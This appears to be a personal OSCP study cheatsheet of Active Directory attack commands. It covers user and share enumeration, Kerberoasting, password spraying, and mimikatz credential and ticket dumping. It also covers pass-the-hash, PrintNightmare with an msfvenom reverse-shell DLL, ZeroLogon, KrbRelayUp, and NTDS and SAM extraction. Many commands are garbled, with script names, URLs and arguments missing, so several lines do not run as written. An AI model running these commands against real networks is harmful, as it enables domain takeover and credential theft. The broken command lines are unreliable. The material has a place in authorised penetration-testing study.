26. Apr 2022

Active Directory

Here are some tips and tricks that got me thru the AD part of my OSCP exam.

Please note that this cheatsheet is outdated. A rewrite is in progress.

Set DNS / hosts #

Add the DC and all found clients into your /etc/hosts file. dc1 client1

You could add the DC to your /etc/resolv.conf. But that will make internet research slower since all your requests would first go and then timeout at the DC.

Get a Shell or Credentials #

DNS Recon

Use fierce↗ to check for other servers inside the AD.

fierce --domain DOMAIN --dns-servers DCIP --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

User Recon

Use windapsearch↗ to make LDAP queries. Often does not require a password!

# Query users
windapsearch -m users --dc DCIP

# Query login names
windapsearch -m users --attrs UserPrincipalName --dc DCIP | awk -F"Name:" '{print $2}' | awk '!/^$/'

# Descriptions (often contain passwords)
windapsearch -m users --attrs Description --dc DCIP

# Query all attributes for password
windapsearch -m users --full --dc DCIP | grep -i password

Use Kerbrute↗ to enumerate users

kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/Names/names.txt 
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Use CrackMapExec↗ to enumerate users

cme IP -u '' -p '' --users

# Get password policy
cme IP -u '' -p '' --pass-poll

Use username-anarchy↗ to format found names on company websites

username-anarchy -i INFILE > OUTFILE

Use cewl↗ to crawl websites for words to pack into a wordlist

cewl -d DEPTH -m MINIMUMLENGT --with-numbers -w OUTFILE LINK
hashcat --force INFILE -r /usr/share/hashcat/rules/best64.rule --stdout > OUTFILE

RPC Recon

# Could require credentials
rpcclient -u '' IP 
    # Check printer description for passwords

impacket-rpcdump IP
# Check for PrinterNightmare
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'

SMB Recon

Check for anonymous/open shares

smbmap -H IP
cme smb IP -u '' -p '' --shares
enum4linux IP

After Shell and or Credentials #

Get a Shell #

Some ways to get a shell by just having a pair of credentials:

# Common
impacket-psexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-smbexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-wmiexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP

# Winrm (tcp/5985) need to be enabled
evil-winrm -i IP -u 'DOMAIN\user' -p 'PASSWORD'

# RDP (tcp+udp/3389) needs to be enabled
rdesktop -r clipboard:PRIMARYCLIPBOARD -r disk:host=/home/ -u 'USER' -p 'PASSWORD'  IP

# Quite rare
impacket-atexec 'DOMAIN\user:PASSWORD@IP' 'command'
impacket-dcomexec 'DOMAIN\user:PASSWORD@IP'

Check for ASREPRoast #

impacket-GetNPUsers 'DOMAIN\user:PASSWORD' -dc-ip DCIP 

Check for Kerberoast #

impacket-GetUserSPNs 'DOMAIN\user:PASSWORD@DCIP'

Basic PowerShell script you can run from a shell inside the AD:

$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain

# Search by what

$Result = $Searcher.Findall()

Write-Host "---------------------------"
Foreach($obj in $Result)
    ForEach($prop in $obj.Properties) {
        # uncommnent to print all attributes
    Write-Host "[SAM Account Name]"
    Write-Host ""
    Write-Host "[User Principal Name]"
    Write-Host ""
    Write-Host "[Service Principal Name]"
    Write-Host "---------------------------"

To request the ticket with PowerShell:

add-type -assemblyname system.identitymodel
new-object system.identitymodel.tokens.kerberosrequestorsecuritytoken -Argumentlist 'SPN'

To request the ticket with mimikatz:

    kerberos::ask /target:SPN
    kerberos::list /export

Verify that the ticket is in memory with klist. Then use mimikatz↗ to export the ticket. This does not require admin or SYSTEM privileges.

    # Verify the ticket exists
    # Export to current folder
    kerberos::list /export

Transfer the ticket to Kali, and crack it with kerberoast↗.

# Setup
virtualenv --python=python3 venv
source venv/bin/activate
git clone     
cd kerberoast
pip3 install pyasn1

# Crack
python /usr/share/wordlists/rockyou.txt ticket.kirbi

Cracking is also possible with Hashcat and kirbi2hashcat↗.

python ticket.kirbi > ticket.hashcat
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt

Check for the Big Exploits #

Those exploits only require valid domain credentials.

PrinterNightmare #


Check with:

impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'
# Terminal 1
git clone
wget -O ./impacket/
virtualenv --python=python3 impacket
source impacket/bin/activate
cd impacket
pip3 install .
pip2 install .

# Terminal 2
source impacket/bin/activate
cd impacket

msfvenom -p windows/shell_reverse_tcp LHOST=LISTEINGIP LPORT=LISTENINGPORT -f dll -o evil.dll drop $(pwd) -smb2support

# Set up listener

# Terminal 1
python3 '\\LISTEINGIP\drop\evil.dll'

SAM the Admin #


git clone
cd sam-the-admin
virtualenv venv
source venv/bin/activate
pip3 install -r requirements.txt
pip2 install -r requirements.txt

python DOMAIN/USER:PASSWORD -dc-ip DCIP -domain-netbios

ZeroLogon #


git clone
cd zerologon


goldenPAC #


impacket-goldenPac ''

Tools #

Mimikatz #

# Hashdump
    # Elevate
    # Check for logged on passwords (requiers admin/system)
    # Dump SAM
    lsadump::lsa /patch

# Overpass the Hash
    sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLM /run:cmd
net use \\DC

# Pass the Ticket
    # Elevate
    # Export the tickets
    # Creates .kirbi files in current folder
    sekurlsa::tickets /export

    # Load Ticket on another client
    kerberos::ptt ticket.kirbi

# Silver Ticket
    # Elevate
    kerberos::golden /user:USER /domain:DOMAIN /sid:DOMAINSID /target:HOSTNAMETARGET /service:SPNTYPE /rce4:SERVICEHASH /ptt

Rubeus #

# Harvest TGTs
.\Rubeus.exe harvest /interval:30

# Password Spray
.\Rubeus.exe brute /password:Password1 /noticket

# Kerberoast
.\Rubeus.exe kerberoast
# Crack on Kali with
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt

# ASREProast
.\Rubeus.exe asreproast
# Crack on Kali with
hashcat --force hash -m 18200  /usr/share/wordlists/rockyou.txt

CrackMapExec #

# Get users
cme smb IP -u USER -d DOMAIN -p PASSWORD --users
# Get shares
cme smb IP -u USER -d DOMAIN -p PASSWORD --shares
# Bruteforce
cme smb IP -u USERLIST -p PWLIST --continue-on-success

Bloodhound #

# Start on Kali
sudo neo4j console
bloodhound --no-sandbox

# Remotely 
bloodhound-python -u USER -p PASSWORD -d DOMAIN -ns IP -c All

# Client
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName
.\sharphound.exe --CollectionMethod All --Domain CONTROLLER.local --ZipFileName

Other Techniques #

KrbRelayUp #

Will get you a local SYSTEM shell if LDAP Signing and LDAP Channel Binding are not enforced

# Do not use cmd.exe or powershell.exe. Those will spawn on desktop not in shell
.\KrbRelayUp.exe relay -d -c -cn evilpc$ -cp rockyou@123
.\KrbRelayUp.exe spawn -d -cn evilpc$ -cp rockyou@123 -s evilservice1 -sc "evil1.exe"

# After the first two have been executed once
.\KrbRelayUp.exe krbscm -s evilservice2 -sc "evil1.exe"

Pass the Hash #

Works only on servers with NTML authentication.

pth-winexe -U USERHASH //IP cmd
evil-winrm -i IP -u USERNAME -H HASH

Dump local SAM and Crack Hashes #

On Windows

# Needs Admin
reg save hklm\sam sam.out
reg save hklm\system system.out

On Kali

samdump sam.out system.out -o hashes.txt

hashcat --force hashes.txt -m 1000 /usr/share/wordlists/rockyou.txt
john  hashes.txt -format=nt -wordlist /usr/share/wordlists/rockyou.txt

Dump the NTDS # -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM local -pwd-last-set -user-status -history

DC Sync Attack #


SPN Impersonate #


# We need to have the same time as the DC
# Stop getting time from vhost
sudo service virtualbox-guest-utils stop
# Update time from DC
sudo service sudo ntpdate DCIP -dc-ip DCIP -spn SPN -hashes HASHFROMDOMUSER -impersonate administrator DOM/USER
export KRB5CCNAME=Administrator.ccache

impacket-psexec -k DOMAIN/Administrator@DC -no-pass

# Revert NTP to VBox
sudo service virtualbox-guest-utils start

Show LAPS Passwords #

If an owned user is either LAPS admin or just LAPS reader:

ldapsearch -v -x -D USER@DOMAIN -w PASSWORD -b "DC=DOMAIN,DC=com" -h DCIP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
Table of Contents